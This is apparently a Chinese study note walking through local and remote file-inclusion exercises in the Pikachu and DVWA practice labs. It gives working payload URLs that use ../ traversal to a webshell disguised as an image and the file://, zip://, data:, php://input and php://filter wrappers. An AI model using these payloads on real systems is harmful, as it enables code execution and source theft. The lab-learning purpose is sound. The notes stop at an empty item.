一、file inclusion(local)🌟🌟
1、在文件上传漏洞的getimagesize中上传拼接的111shell2.jpg文件
(1)这是文件url路径
http://192.168.1.32:8083/vul/unsafeupload/getimagesize.php
(2)这是题中所给图片保存路径:
uploads/2022/01/25/63414861efd573ba090720236716.jpg
(3)将二者拼接
http://192.168.1.32:8083/vul/unsafeupload/uploads/2022/01/25/63414861efd573ba090720236716.jpg
(4)尝试访问拼接的url,访问成功则拼接正确
2、在inclusion中随便点一个选项
(1)这是文件目录:
http://192.168.1.32:8083/vul/fileinclude/fi_local.php?filename=file2.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
(2)使用include进行文件包含;
但由于无从得知vul后的文件还包含了几级,一级就是../,两级就是../../,然后上面拼接的包含一句话木马的图片的url再进行拼接。
(3)也就是拼接
http://192.168.1.32:8083/vul/fileinclude/fi_local.php?filename=file2.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
和
http://192.168.1.32:8083/vul/unsafeupload/uploads/2022/01/25/63414861efd573ba090720236716.jpg
尝试一级或二级包含。。最后发现两级包含可以验证成功,也就是:
http://192.168.1.32:8083/vul//fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2022/01/25/63414861efd573ba090720236716.jpg&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
验证成功:
二、file inclusion(romote远程文件包含)
(1)远程文件包含,无需上传,直接将生成的111shell2.jpg文件地址进行拼接尝试一下:
先随便选一个图片
将该url地址:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=include%2Ffile1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#
拼接111shell2.php地址:
C:/safe/practice/111shell2.jpg
为:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=C:/safe/practice/111shell2.jpg&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#
(2)hackbar验证
成功
//拓展:
(1)尝试将dvwa中文件上传漏洞中上传的木马包含进此题中:
该题url地址:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=include%2Ffile1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#
根据medium模式报错能得到dvwa文件上传漏洞上传成功的文件地址:
C:/phpstudy_pro/WWW/dvwa/hackable/uploads/111shell2.jpg
进行拼接为:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=C:/phpstudy_pro/WWW/dvwa/hackable/uploads/111shell2.jpg&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#
进行验证:
成功
(2)尝试使用file伪协议进行文件包含:
该题url地址:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=include%2Ffile1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#
与111shell2.jpg伪协议地址:
file:///phpstudy_pro/WWW/dvwa/hackable/uploads/111shell2.jpg
进行拼接为:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=file:///phpstudy_pro/WWW/dvwa/hackable/uploads/111shell2.jpg&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#
进行验证
成功
(3)尝试使用其他伪协议:
1)zip伪协议:
将shell2.php文件转换为zip文件
shell2.php使用zip伪协议访问:
zip://C:/safe/practice/shell2.zip%23shell2.php
与该题url地址进行拼接为:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=zip://C:/safe/practice/shell2.zip%shell2.php&submit=1
验证:
报错,原因应该是我的虚拟机上没有默认的zip,只有7z
2)data伪协议:
格式:data:text/plain,<?php phpinfo(); ?>
拼接为:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=data:text/plain,<?php phpinfo(); ?>&submit=1
验证成功:
🌟data变体:使用base64对data内容进行编码:
data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
拼接:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==&submit=1
验证:
3)php伪协议
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=php://input&submit=1
然后post提交php命令行即可
但无法直接连antsword,可以在postdata里写一个生成一句话木马的php语句
4)读网页源码的伪协议(一般会有base64编码,需要解码):
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=php://filter/read=convert.base64-ebcode/resource=fi_remote.php&submit=1
5)常见伪协议:
6)